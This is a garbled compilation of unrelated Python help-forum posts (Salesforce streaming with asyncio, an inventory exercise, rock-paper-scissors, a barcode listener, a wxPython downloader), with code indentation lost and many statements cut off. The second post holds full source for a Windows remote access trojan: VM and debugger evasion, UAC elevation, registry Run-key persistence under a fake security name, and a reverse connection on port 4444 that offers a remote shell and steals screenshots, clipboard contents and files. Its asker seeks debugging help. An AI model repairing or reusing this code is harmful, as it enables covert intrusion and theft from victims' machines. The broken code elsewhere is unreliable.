Python trying to run one Async function and one infinite loop simultaneously - python
I am trying to monitor a stream of salesforce events to play a ringtone each time a case comes in based on case origin. Initially I was querying the API from a thread and I was able to have the UI run in the main function and the monitoring run on a thread in the background. Now that I have switched to the streaming API I need to use async to monitor for responses when a case is assigned. This has caused issues where if I start the async loop first my UI never starts but if I start the UI first my async loop never starts.... I have attached my code below:
Here is my first python script where I actually define the async function and call my user interface.
import asyncio
from aiosfstream import SalesforceStreamingClient
from win10toast import ToastNotifier
import Ringtone
from threading import Thread
import vlc
def notifier(type, system):
n = ToastNotifier()
n.show_toast("SalesForce Notification Manager", "Incoming " + type + " From" + system, duration=10,
async def subscribeToSalesforce():
async with SalesforceStreamingClient(
# Connect to Salesforce streaming API
sandbox=True) as client:
# Subscribe to one or more topics
apiLink = Ringtone.login()
currentUserID = Ringtone.getUserID(apiLink)
await client.subscribe("/event/NewEmail__e")
# listen for incoming messages
async for message in client:
topic = message["channel"]
data = message["data"]
print(f"{topic}: {data}")
data = data['payload']
if data['Assigned__c']:
if data['Assigned__c'] == 'Assigned':
if data['OwnerID__c'] == currentUserID:
def findType(data):
with open('Ref/Files/phone.txt') as f:
phone = f.readline()
with open('Ref/Files/email.txt') as f:
email = f.readline()
with open('Ref/Files/chat.txt') as f:
chat = f.readline()
with open('Ref/Files/Volume.txt') as f:
volume = f.readline()
with open('Ref/Files/notifs.txt') as f:
notifsRaw = f.readline()
notifs = True
if data['Assigned__c']:
if data['Assigned__c'] == 'Assigned':
if data['VM_Offline_Chat__c'] == True:
if notifs:
t2 = Thread(target=notifier, args=("Voicemail/Offline Chat", data['Program__c']))
p = vlc.MediaPlayer()
elif data['Case_Type__c'] == 'Phone':
if notifs:
t3 = Thread(target=notifier, args=("Call", data['Program__c']))
p = vlc.MediaPlayer(phone)
elif data['Case_Type__c'] == 'Email':
if notifs:
t4 = Thread(target=notifier, args=("Email", data['Program__c']))
p = vlc.MediaPlayer(email)
elif data['Case_Type__c'] == 'Chat':
if notifs:
t5 = Thread(target=notifier, args=("Chat", data['Program__c']))
p = vlc.MediaPlayer(chat)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
t1 = Thread(target=Ringtone.userInterface(), args=[])
Here is my other python file where the user interface function is stored:
import PySimpleGUI as sg
import time
import vlc
from simple_salesforce import Salesforce
import distutils.util
_VARS = {'window': False,
'fig_agg': False,
'pltFig': False}
ttk_style = 'Clam'
with open('Ref/Files/Volume.txt') as f:
sliderVal = f.readline()
with open('Ref/Files/chatchosen.txt') as f:
chatchosen = f.readline()
with open('Ref/Files/emailchosen.txt') as f:
emailchosen = f.readline()
with open('Ref/Files/phonechosen.txt') as f:
phonechosen = f.readline()
with open('Ref/Files/notifs.txt') as f:
notifs = f.readline()
notifs = bool(distutils.util.strtobool(notifs))
command = ['Test Ringtone']
cmd_layout = [[sg.Button(cmd, use_ttk_buttons=True, size=(10, 1))] for cmd in command]
ringtones = ['Classical Piano', 'Mozart', 'Game of Thrones', 'Harry Potter', 'Mandalorian', 'Star Wars', 'Play That Funky Music', 'You Are My Sunshine', 'iPhone', 'Blackberry', 'Minimal 1', 'Minimal 2', 'Minimal 3']
def open_window(name):
Title = 'Enter Salesforce Username:'
Window = 'Username'
LayoutItems = [
[sg.Input(name, key='edit')],
[sg.Button('Okay', use_ttk_buttons=True), sg.Button('Cancel', use_ttk_buttons=True)]
window = sg.Window(Window, LayoutItems, resizable=True, modal=True)
while True:
event, values =
if event == "Exit" or event == sg.WIN_CLOSED:
elif event == "Cancel":
return 'Cancel'
elif event == "Okay":
if values['edit'] != '':
return values['edit']
return values['edit']
def open_password(name, num):
if num == 4:
Title = 'Enter Salesforce Password:'
Window = 'Password'
elif num == 5:
Title = 'Enter Salesforce Security Token:'
Window = 'Token'
LayoutItems = [
[sg.Input(name, key='edit', password_char='*')],
[sg.Button('Okay', use_ttk_buttons=True), sg.Button('Cancel', use_ttk_buttons=True)]
window = sg.Window(Window, LayoutItems, resizable=True, modal=True)
while True:
event, values =
if event == "Exit" or event == sg.WIN_CLOSED:
elif event == "Cancel":
return 'Cancel'
elif event == "Okay":
if values['edit'] != '':
return values['edit']
return values['edit']
def login():
with open('Ref/Files/Info1.txt') as f:
usernameold = f.readline()
with open('Ref/Files/Info2.txt') as f:
passwordold = f.readline()
with open('Ref/Files/Info3.txt') as f:
tokenold = f.readline()
username = open_window(usernameold)
password = open_password(passwordold, 4)
token = open_password(tokenold, 5)
with open('Ref/Files/Info1.txt', 'w') as f:
with open('Ref/Files/Info2.txt', 'w') as f:
with open('Ref/Files/Info3.txt', 'w') as f:
sf = Salesforce(username=username, password=password, security_token=token, domain='test')
sg.popup('Incorrect Username/Password Combination')
return sf
def getUserID(apiLink):
identity_url = API.restful('')['identity']
currentUser = API.User.get(identity_url[-18:])
currentUserID = currentUser['Id']
return currentUserID
employee_list_column = [
[sg.Image('K2.png', size=(280, 100))],
[sg.Listbox(values=ringtones, enable_events=True, size=(40, 20), key="RingtoneList"), sg.Column(cmd_layout)],
[sg.Checkbox('Enable Windows Notifications', default=notifs, key="notifsBox")],
[sg.Button('Save Phone Ringtone Selection', use_ttk_buttons=True, key='PhoneRingtone'), sg.Text(phonechosen, key= 'PhoneChosen')],
[sg.Button('Save Email Ringtone Selection', use_ttk_buttons=True, key='EmailRingtone'), sg.Text(emailchosen, key= 'EmailChosen')],
[sg.Button('Save Chat Ringtone Selection', use_ttk_buttons=True, key='ChatRingtone'), sg.Text(chatchosen, key= 'ChatChosen')],
[sg.Slider(orientation ='horizontal', key='Volume', range=(20,100), default_value= int(sliderVal), enable_events=True)]
layout = [
def chooseRingtones(chosen):
if chosen == 'Classical Piano':
val = '/Ref/Audio/ClassicalPiano.mp3'
elif chosen == 'Mozart':
val = '/Ref/Audio/Mozart.mp3'
elif chosen == 'Mandalorian':
val = '/Ref/Audio/mandalorian_call.mp3'
elif chosen == 'Game of Thrones':
val = '/Ref/Audio/GOT.mp3'
elif chosen == 'Harry Potter':
val = '/Ref/Audio/HarryPotter.mp3'
elif chosen == 'Star Wars':
val = '/Ref/Audio/Imperial.mp3'
elif chosen == 'Play That Funky Music':
val = '/Ref/Audio/PlayThatFunky.mp3'
elif chosen == 'You Are My Sunshine':
val = '/Ref/Audio/YouAreMySunshine.mp3'
elif chosen == 'ival':
val = '/Ref/Audio/ival.mp3'
elif chosen == 'Minimal 1':
val = '/Ref/Audio/Normal1.mp3'
elif chosen == 'Minimal 2':
val = '/Ref/Audio/Normal2.mp3'
elif chosen == 'Minimal 3':
val = '/Ref/Audio/Normal3.mp3'
return val
def userInterface():
start_time = time.time() - 5
window = sg.Window("Salesforce Notification Manager", layout, resizable=True)
while True:
event, values =
with open('Ref/Files/Volume.txt') as f:
volume = f.readline()
if event == "Exit" or event == sg.WIN_CLOSED:
programClose = True
elif event == 'Test Ringtone':
name = values['RingtoneList']
if name:
if start_time + 1 <= time.time():
start_time = time.time()
chosen = name[0]
if chosen == 'Classical Piano':
p = vlc.MediaPlayer("/Ref/Audio/ClassicalPiano.mp3")
elif chosen == 'Mozart':
p = vlc.MediaPlayer("/Ref/Audio/Mozart.mp3")
elif chosen == 'Mandalorian':
p = vlc.MediaPlayer('/Ref/Audio/mandalorian_call.mp3')
elif chosen == 'Game of Thrones':
p = vlc.MediaPlayer('/Ref/Audio/GOT.mp3')
elif chosen == 'Harry Potter':
p = vlc.MediaPlayer('/Ref/Audio/HarryPotter.mp3')
elif chosen == 'Star Wars':
p = vlc.MediaPlayer('/Ref/Audio/Imperial.mp3')
elif chosen == 'Play That Funky Music':
p = vlc.MediaPlayer('/Ref/Audio/PlayThatFunky.mp3')
elif chosen == 'You Are My Sunshine':
p = vlc.MediaPlayer('/Ref/Audio/YouAreMySunshine.mp3')
elif chosen == 'iPhone':
p = vlc.MediaPlayer('/Ref/Audio/iPhone.mp3')
elif chosen == 'Blackberry':
p = vlc.MediaPlayer('/Ref/Audio/Blackberry.mp3')
elif chosen == 'Minimal 1':
p = vlc.MediaPlayer('/Ref/Audio/Normal1.mp3')
elif chosen == 'Minimal 2':
p = vlc.MediaPlayer('/Ref/Audio/Normal2.m4a')
elif chosen == 'Minimal 3':
p = vlc.MediaPlayer('/Ref/Audio/Normal3.mp3')
sg.Popup('No Ringtone Selected')
elif event == 'PhoneRingtone':
name = values['RingtoneList']
if name:
chosen = name[0]
chosen1 = "Phone Ringtone Chosen: " + chosen
phone = chooseRingtones(chosen)
with open('Ref/Files/phonechosen.txt', 'w') as f:
with open('Ref/Files/phone.txt', 'w') as f:
sg.Popup('No Ringtone Selected')
elif event == 'ChatRingtone':
name = values['RingtoneList']
if name:
chosen = name[0]
chosen1 = " Chat Ringtone Chosen: " + chosen
chat = chooseRingtones(chosen)
with open('Ref/Files/emailchosen.txt', 'w') as f:
with open('Ref/Files/chat.txt', 'w') as f:
sg.Popup('No Ringtone Selected')
elif event == 'EmailRingtone':
name = values['RingtoneList']
if name:
chosen = name[0]
chosen1 = "Email Ringtone Chosen: " + chosen
email = chooseRingtones(chosen)
with open('Ref/Files/chatchosen.txt', 'w') as f:
with open('Ref/Files/email.txt', 'w') as f:
sg.popup('No ringtone is selected')
elif event == 'Volume':
slider = window[event]
volume = int(slider.TKScale.get())
with open('Ref/Files/Volume.txt', 'w') as f:
elif event == 'notifsBox':
notifs = values["notifsBox"]
with open('Ref/Files/notifs.txt', 'w') as f:
Sorry if my code is sloppy. I'm new to all of this and the async stuff specifically is very confusing for me.
PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions
Whenever I run my code it gives me "PermissionError: [WinError 10013] An attempt was made to access a socket in a way forbidden by its access permissions" error, it happened after many Python updates. Here's the code: #from tkinter import messagebox #messagebox.showerror("Error", f"ResourceUnavailable: Program 'cmd.exe' failed to run: An error occurred trying to start process") from PIL import ImageGrab import socket import base64 import os import platform import time import random, string import psutil import subprocess import winreg as reg import shutil import ctypes from ctypes import windll import sys import threading from pynput.mouse import Controller global mouse_controller global mouse_movement_counter global mouse_movement class evasiontechs: mouse_movement_counter = 2000 mouse_controller = Controller() mousemovecount = 2000 mouse_controller = Controller() def zpVXAIPnyaQaYr(): # evation techs vmproc1 = "vmsrvc.exe" vmproc2 = "vmusrvc.exe" vmproc3 = "vmtoolsd.exe" vmproc5 = "vboxtry.exe" vmproc6 = "df5serv.exe" vmproc7 = "vboxservice.exe" for proc in psutil.process_iter(): try: if == vmproc1.lower() or == vmproc2.lower() or == vmproc3.lower() or == vmproc5.lower() or == vmproc6.lower() or == vmproc7.lower(): exit() except WindowsError: vmpath1 = os.path.exists(r"C:\\windows\system32\\drivers\\mci.sys") vmpath2 = os.path.exists(r"C:\\windows\system32\\drivers\\mhgfs.sys") vmpath3 = os.path.exists(r"C:\\windows\system32\\drivers\\mmouse.sys") vmpath4 = os.path.exists(r"C:\\windows\system32\\drivers\\mscsi.sys") vmpath5 = os.path.exists(r"C:\\windows\system32\\drivers\\musemouse.sys") vmpath6 = os.path.exists(r"C:\\windows\system32\\drivers\\mx_svga.sys") vmpath7 = os.path.exists(r"C:\\windows\system32\\drivers\\mxnet.sys") vmpath8 = os.path.exists(r"C:\\windows\system32\\drivers\\VBoxMouse.sys") if vmpath1 == True or vmpath2 == True or vmpath3 == True or vmpath4 == True or vmpath5 == True or vmpath6 == True or vmpath7 == True or vmpath8 == True: exit() zpVXAIPnyaQaYr() def evation(): mouse_movement() return True if not is_debug(): return False def mouse_movement(): counter = 0 current_position = mouse_controller.position while counter < mouse_movement_counter: old_position = mouse_controller.position if current_position != old_position: current_position = old_position counter += 1 def is_debug(): try: return windll.kernel32.IsDebuggerPresent() != 0 except Exception: return True #letters = ''.join(random.choice(string.ascii_letters) for l in range(16)) #X = 0 #letters = time.sleep(X) #letters def zJnWJKrmzwZTAHJT(f_name, path): address=os.path.join(path, f_name) key = reg.HKEY_CURRENT_USER key_value = "Software\Microsoft\Windows\CurrentVersion\Run" open = reg.OpenKey(key, key_value, 0, reg.KEY_ALL_ACCESS) reg.SetValueEx(open, "Windows Cloud Security", 0, reg.REG_SZ, address) reg.CloseKey(open) BUFFER_SIZE = 1024 def connection(): try: clientHOST="" clientPORT=4444 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) def TeZfZTttAYMjZZ(): try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False if TeZfZTttAYMjZZ(): connection() else: ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1) if TeZfZTttAYMjZZ() == True: pass else: TeZfZTttAYMjZZ() if TeZfZTttAYMjZZ() == True: pass else: TeZfZTttAYMjZZ() s.connect((clientHOST, clientPORT)) s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 10000, 3000)) sys.setrecursionlimit(1500) while True: Handler_DATA = s.recv(BUFFER_SIZE).decode("utf-8") if Handler_DATA == "screenshot": screenshot = ImageGrab.grab() file = "xpvuNBYVvC.jpg" f = open(file, 'rb') data=base64.b64encode(data) f.close() message = data s.send(data) time.sleep(1) os.remove(file) elif Handler_DATA == "restart": if platform.system() == "Windows": os.system("shutdown -t 0 -r -f") else: os.system("reboot") elif Handler_DATA == "shutdown": if platform.system() == "Windows": os.system("shutdown /s /t 1") else: os.system("shutdown now") elif Handler_DATA == "shell": cwd = os.getcwd() s.send(("dir:" + str(cwd)).encode('utf-8')) while True: try: command = s.recv(2048).strip().decode('utf-8') if 'terminate' in command: break elif 'clipboard' in command: CF_TEXT = 1 kernel32 = ctypes.windll.kernel32 user32 = ctypes.windll.user32 kernel32.GlobalLock.argtypes = [ctypes.c_void_p] kernel32.GlobalLock.restype = ctypes.c_void_p kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p] user32.GetClipboardData.restype = ctypes.c_void_p user32.OpenClipboard(0) IsClipboardFormatAvailable = user32.IsClipboardFormatAvailable GetClipboardData = user32.GetClipboardData CloseClipboard = user32.CloseClipboard try: if IsClipboardFormatAvailable(CF_TEXT): getClipboardData = GetClipboardData(CF_TEXT) getClipboardDataLoc = kernel32.GlobalLock(getClipboardData) text = ctypes.c_char_p(getClipboardDataLoc) value = text.value kernel32.GlobalUnlock(getClipboardDataLoc) s.send(str(value).encode("utf-8")) if IsClipboardFormatAvailable(CF_TEXT) == False: pass finally: CloseClipboard() elif command.startswith('grab'): file_name = command[5:] file_size = os.path.getsize(file_name) s.send(file_name.encode('utf-8')) s.recv(5120).decode('utf-8') s.send(str(file_size).encode('utf-8')) s.recv(5120).decode('utf-8') with open(file_name, "rb") as file: c = 0 start_time = time.time() while c < file_size: data = if not (data): break s.sendall(data) c += len(data) end_time = time.time() elif 'transfer' in command: file_name = s.recv(5120).decode('utf-8') file_size = s.recv(5120).decode('utf-8') with open(file_name, "wb") as file: c = 0 start_time = time.time() while c < int(file_size): data = s.recv(5120) if not (data): break file.write(data) c += len(data) end_time = time.time() elif command.startswith('cd '): dir = command[3:] try: os.chdir(dir) except: os.chdir(cwd) cwd = os.getcwd() s.send(("dir:" + str(cwd)).encode('utf-8')) elif command.startswith('persistence'): file_name = command[12:] pth = os.getcwd() try: zJnWJKrmzwZTAHJT(file_name, pth) s.send("Hooked".encode('utf-8')) except Exception as e: s.send(str(e).encode('utf-8')) else: CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) out = err = s.send(out) s.send(err) if (out == b'' and err == b''): s.send("Invalid".encode('utf-8')) except Exception as e: s.send(str(e).encode('utf-8')) elif Handler_DATA == "exit": s.close() exit() except socket.error: connection() if connection() == True: pass else: connection() except MemoryError: pass except SystemError: pass def TCjgbxixqsdxEc(): cpuChk = psutil.cpu_count(logical=False) if cpuChk == 1: exit() if cpuChk == 3: exit() else: connection() TCjgbxixqsdxEc() def PTYMEYUXBRwddE(): avgDiskChk = shutil.disk_usage("/") div = (avgDiskChk // (2**30)) if div == 59: exit() if div == 60: exit() if div == 65: exit() if div == 120: exit() if div == 119: exit() else: connection() PTYMEYUXBRwddE() connection() I tried disabling Windows Defneder and Windows Firewall, even running it on an isolated VM doesn't help, and also running the code as administrator wont' help, I ran out of ideas...
Add and remove strings from existing list in Python
I am doing a schoolwork whereas I am doing a list where you add or remove cars and buyers. I have solved the car part, however I have trouble with adding the buyers part. I want the buyers to be added to the list, and removed at choice. I have partially solved the adding issue, however, whenever I try to remove a buyer it doesn't seem to work. This is my code: import json import os.path # Class class Inventory: cars = {} buyers = {} def __init__ (self): self.load() def add(self,key,qty): q = 0 if key in v =[key] q = v + qty else: q = qty[key] = q print(f'added {qty} {key}: total = {[key]}') def add2(self,buy): if buy in self.buyers: b = self.buyers[buy] else: b = buy self.buyers[buy] = b print(f'added {buy}') def remove2(self,buy): if buy in self.buyers: b = str(self.buyers[buy]) else: b = buy self.buyers[buy] = b print(f'removed {buy}') def remove(self,key,qty): q = 0 if key in v =[key] q = v - qty if q < 0: q = 0[key] = q print(f'removed {qty} {key}: total = {[key]}') def display(self): for key, value in print(f'{key} = {value}') for buy in self.buyers.items(): print(f'{buy}') def save(self): print('saving information...') with open('inventory4.txt', 'w') as f: json.dump(,f) json.dump(self.buyers,f) print('information saved!') def load(self): print('loading information...') if not os.path.exists('inventory4.txt'): print('nothing to load!') return with open('inventory4.txt', 'r') as f: = json.load(f) self.buyers = json.load(f) print('Information Loaded!') def main(): inv = Inventory() while True: print('Write your choice...\n') action = input('Choice:\nadd car, remove car, add buyer, remove buyer, list, save, exit: ') if action == 'avsluta': break if action == 'add car' or action == 'remove car': key = input('Add/remove specific car: ') qty = int(input('Quantity: ')) if action == 'add car': inv.add(key,qty) if action == 'remove car': inv.remove(key,qty) if action == 'add buyer' or action == 'remove buyer': buyers = input('Add/remove buyer: ') if action == 'add buyer': inv.add2(buyers) if action == 'remove buyer': inv.remove2(buyers) if action == 'list': print('____________________________________\n') inv.display() print('____________________________________\n') if action == 'save': if __name__ == "__main__": main()
My code prints out 'Invalid input' every time in a game Rock Paper Scissors
My code prints out every time 'Invalid input', but I want it to print 'Invalid input' only when something other besides "rock", 'paper' , 'scissors', '!exit', '!rating' is written in the input, can someone help me, please, I don't really get why it is like this. Here you can see my code: import random import math HELP_TEXT = '"' class Rating: def __init__(self, name): self._old_data = None self._user_name = name self.score = self._get() def _get(self): try: with open('rating.txt', 'r') as f: for line in f: name, score = line.split() if name == self._user_name: self._old_data = line return int(score) with open('rating.txt', 'a') as f: f.write(f'{self._user_name} 0') self._old_data = f'{self._user_name} 0' return 0 except FileNotFoundError: with open('rating.txt', 'w') as f: f.write(f'{self._user_name} 0') self._old_data = f'{self._user_name} 0' return 0 def add(self, score): self.score += score def save(self): with open('rating.txt', 'r') as f: old_data = new_data = old_data.replace(self._old_data, f'{self._user_name} {self.score}\n') with open('rating.txt', 'w') as f: f.write(new_data) class User: def __init__(self): = '' self._hello_user() self.rating = Rating( def _hello_user(self): = input('Enter your name: ').strip().replace(' ', '') print(f'Hello, {}') class Game: def __init__(self): self.RPS = {} self.user_choice = '' self.game_choice = '' self.result = '' = HELP_TEXT self.user = User() def referee(self): if self.user_choice == self.game_choice: return 'draw' elif self.user_choice in self.RPS.get(self.game_choice): return 'win' else: return 'lose' def result_processing(self): if self.result == 'draw': self.user.rating.add(50) print(f'There is a draw ({self.game_choice})') elif self.result == 'lose': print(f'Sorry, but computer chose {self.game_choice}') elif self.result == 'win': self.user.rating.add(100) print(f'Well done. Computer chose {self.game_choice} and failed') else : print('Invalid input') def generator(self, user_input): output = {} items = list(user_input.split(',')) if len(items) == 1: return {'rock': ['paper'], 'paper': ['scissors'], 'scissors': ['rock']} double_items = items + items half_items = math.ceil(len(items) / 2) for i in range(len(items)): output[items[i]] = double_items[i + 1:i + half_items:1] return output def run(self): self.RPS = self.generator(input()) print('Okay, let\'s start') while True: self.user_choice = input().strip() if self.user_choice == '!exit': break elif self.user_choice == '!rating': print(f'Your rating: {self.user.rating.score}') continue elif self.user_choice == '!help': print( continue self.game_choice = random.choice(list(self.RPS.keys())) self.result = self.referee() self.result_processing() print('Bye!') if __name__ == '__main__': game = Game()
You can add a check that the input is one of the keys to referee(). def referee(self): if self.user_choice == self.game_choice: return 'draw' elif self.user_choice not in self.RPS: return 'invalid' elif self.user_choice in self.RPS[self.game_choice]: return 'win' else: return 'lose'
python memory leak listening to /dev/input
This is a loop I'm using to listen in on a barcode scanner. I have up to 8 instances of this program running at the same time one for each scanner. Although I'm getting the desired results for a while, each process eventually uses up a ton of cpu and memory. Any ideas why? #!/usr/bin/env python import os, sys from evdev import InputDevice from select import select ... = InputDevice(self.devRoot + self.scanner['by-id']) ... def process(self): badge = '' while True: r,w,x = select([], [], []) try: for event in if event.type == 1 and event.value != 4: if event.code < 11 and event.code > 0: # for numbers 1 to 9 code = event.code - 1 badge = badge + str(code) elif event.code == 11: # for number 0 badge = badge + '0' elif event.code == 28: theBadge = badge[::2].strip() if len(theBadge) == 5: fn = self.genFileName(theBadge) self.touch(fn) # reset the badge badge = '' else: # grab a letter or character from the key dictionary code = int(event.code) badge += self.deviceDict.keyDict[code] except Exception as e: continue def genFileName(self, badge): return str(self.scannerNum) + '-' + badge def touch(self, filename): TESTING = True if len(filename) <= 2: return 1 filePath = self.scanDir + filename touchCommand = 'touch ' + filePath os.system(touchCommand) return
Python - Files wont download
Here's My code, all the urls are in a Config Parser format file. When the button is pressed files will not download. What did go wrong? I used urllib should I have used urllib2? Some of the functions may be there but not used just ignore that. import wx import ConfigParser import urllib def Download(url): response = urllib.urlopen(url).read() doned = wx.MessageDialog("Download Done") doned.ShowModal() doned.Destroy() #First thing i gona do is Parse 98 box data BoxParser = ConfigParser.RawConfigParser() #Set Raw"") #Mount into #Get Vars, and print them WxTitle = BoxParser.get("meta_data","Window_title") #get the window title Application = BoxParser.get("meta_data","Application") #Get app name Desc = BoxParser.get("meta_data","Description") #Get the description of the app Author = BoxParser.get("meta_data","Author") #Of course! I dont wanna be plagurized Contact = BoxParser.get("meta_data","Contact_Info") #My Contact Info Date = BoxParser.get("meta_data","Date") #Date when the current update was made #UpdateUrl = BoxParser.get("meta_data","Update_url") #Url to update #BoxUp = BoxParser.get("meta_data","Update_box") #Url to update # Meta Data loaded #time to load the firmwares e660 = BoxParser.get("Firmware_links","660") #6.60 e6602 = False e660g = BoxParser.get("Firmware_links","660go") #6.60 Go Eboot e6602g = False e639 = BoxParser.get("Firmware_links","639") #6.39 e6392 = False e639g = BoxParser.get("Firmware_links","639go") #6.39 Go Eboot e6392g = False e635 = BoxParser.get("Firmware_links","635") #6.35 e6352 = False e635g = BoxParser.get("Firmware_links","635go") #6.35 Go Eboot e6352g = False e620 = BoxParser.get("Firmware_links","620") #6.20 e550 = BoxParser.get("Firmware_links","550") #5.50 e5502 = False e500 = BoxParser.get("Firmware_links","500") #5.00 e5002 = False e401 = BoxParser.get("Firmware_links","401") #4.01 e4012 = False #Firmwares Loaded def BoxUpdate(): Download(Update_box) #Check if DD equ true so we can post the MSG if downloaddone == True: Done2 = wx.MessageDialog(self,"Download Done, 98.Box Updated!") Done2.ShowModal() Done.Destroy() #Time to get out Gui class FrameClass(wx.Frame): #Finally making the gui! def __init__(self,parent,title): #making init! app = wx.Frame app.__init__(self,parent,title=WxTitle,size = (340,280)) #set window size Menu = wx.Menu() #Lets make a menu! panel = wx.Panel(self) #set the panel var contact = Menu.Append(wx.ID_NONE,"&Contact Info") #add update thing self.Bind(wx.EVT_MENU,self.contact1,contact) #Add event for Update fwMsg = wx.StaticText(panel, label='Firmware', pos=(59,25)) fwlist = wx.ComboBox(panel,pos=(118,22), choices=["6.60","6.60 Go/N1000","6.39","6.39 Go/N1000","6.35 Go/N1000","5.50","5.00","4.01"]) self.Bind(wx.EVT_COMBOBOX, self.getsel, fwlist) downloadbutton = wx.Button(panel, label="Download FW", pos=(100,76)) self.Bind(wx.EVT_BUTTON, self.DLB, downloadbutton) #now for the member! TopM = wx.MenuBar() TopM.Append(Menu, "Tool Opt") self.SetMenuBar(TopM) self.Show(True) def DLUpdate(self,e): #Check if DD equ true so we can post the MSG Download(Update_url) print "downloading" Done = wx.MessageDialog(self,"Download Done, download stored in \"DLBOXV$.zip\" file") Done.ShowModal() Done.Destroy() def contact1(self,e): con = wx.MessageDialog(self,Contact) con.ShowModal() con.Destroy() def getsel(self,e): i = e.GetString() if i == "6.60": e6602 = True print e6602,"660" else: e6602 = False print e6602,"660" if i == "6.60 Go/N1000": e6602g = True print e6602g,"660 go" else: e6602g = False print e6602g,"660 go" if i == "6.39": e6392 = True print e6392,"639" else: e6392 = False print e6392,"639" if i == "6.39 Go/N1000": e6392g = True print e6392g,"639 go" else: e6392g = False print e6392g,"639 go" if i == "6.35 Go/N1000": e6352g = False print e6352g,"635 go" else: e6352g = False print e6352g,"635 go" if i == "5.50": e5502 = True print e5502,"550" else: e5502 = False print e5502,"550" if i == "500": e5002 = True print e5002,"500" else: e5002 = False print e5002,"500" if i == "401": e4012 = True print e4012,"401" else: e4012 = False print e4012,"401" def DLB(self,e): if e6602 == True: Download(e660) elif e6602g == True: Download(e660g) elif e6392 == True: Download(e639) elif e639g == True: Download(e639g) elif e6352g == True: Download(e635g) elif e5502 == True: Download(e550) elif e5002 == True: Download(e500) elif e4012 == True: Download(e401) G = wx.App(False) Win = FrameClass(None,WxTitle) G.MainLoop() But at the function Download(url) will not function, it will not download def Download(url): response = urllib.urlopen(url).read() doned = wx.MessageDialog("Download Done") doned.ShowModal() doned.Destroy() what triggers Download(url) is a few if and elsif statements def getsel(self,e): i = e.GetString() if i == "6.60": e6602 = True print e6602,"660" else: e6602 = False print e6602,"660" if i == "6.60 Go/N1000": e6602g = True print e6602g,"660 go" else: e6602g = False print e6602g,"660 go" if i == "6.39": e6392 = True print e6392,"639" else: e6392 = False print e6392,"639" if i == "6.39 Go/N1000": e6392g = True print e6392g,"639 go" else: e6392g = False print e6392g,"639 go" if i == "6.35 Go/N1000": e6352g = False print e6352g,"635 go" else: e6352g = False print e6352g,"635 go" if i == "5.50": e5502 = True print e5502,"550" else: e5502 = False print e5502,"550" if i == "500": e5002 = True print e5002,"500" else: e5002 = False print e5002,"500" if i == "401": e4012 = True print e4012,"401" else: e4012 = False print e4012,"401" def DLB(self,e): if e6602 == True: Download(e660) elif e6602g == True: Download(e660g) elif e6392 == True: Download(e639) elif e639g == True: Download(e639g) elif e6352g == True: Download(e635g) elif e5502 == True: Download(e550) elif e5002 == True: Download(e500) elif e4012 == True: Download(e401)
What did go wrong? I used urllib should I have used urllib2? Yes. The fact that just adding the 2 to your code fixes the problem is obviously proof of that, but it doesn't explain much. As the docs for urllib.urlopen say: Deprecated since version 2.6: The urlopen() function has been removed in Python 3 in favor of urllib2.urlopen(). This doesn't mean that they stopped fixing bugs in urllib as of 2.6 (there was a bug fix as late as 2.7.9), but it does mean that missing functionality will never be added. That includes, among other things, some kinds of HTTP authentication, redirections, HTTPS with non-standard CAs, proxy settings, and proxy authentication. Without knowing anything at all about the problem besides "the download doesn't happen", or what URL you're trying to download (you seem to be passing in a variable named Update_box that isn't assigned anywhere), or the setup you're running on, it's impossible to know exactly which one of these problems (or any others) is the key.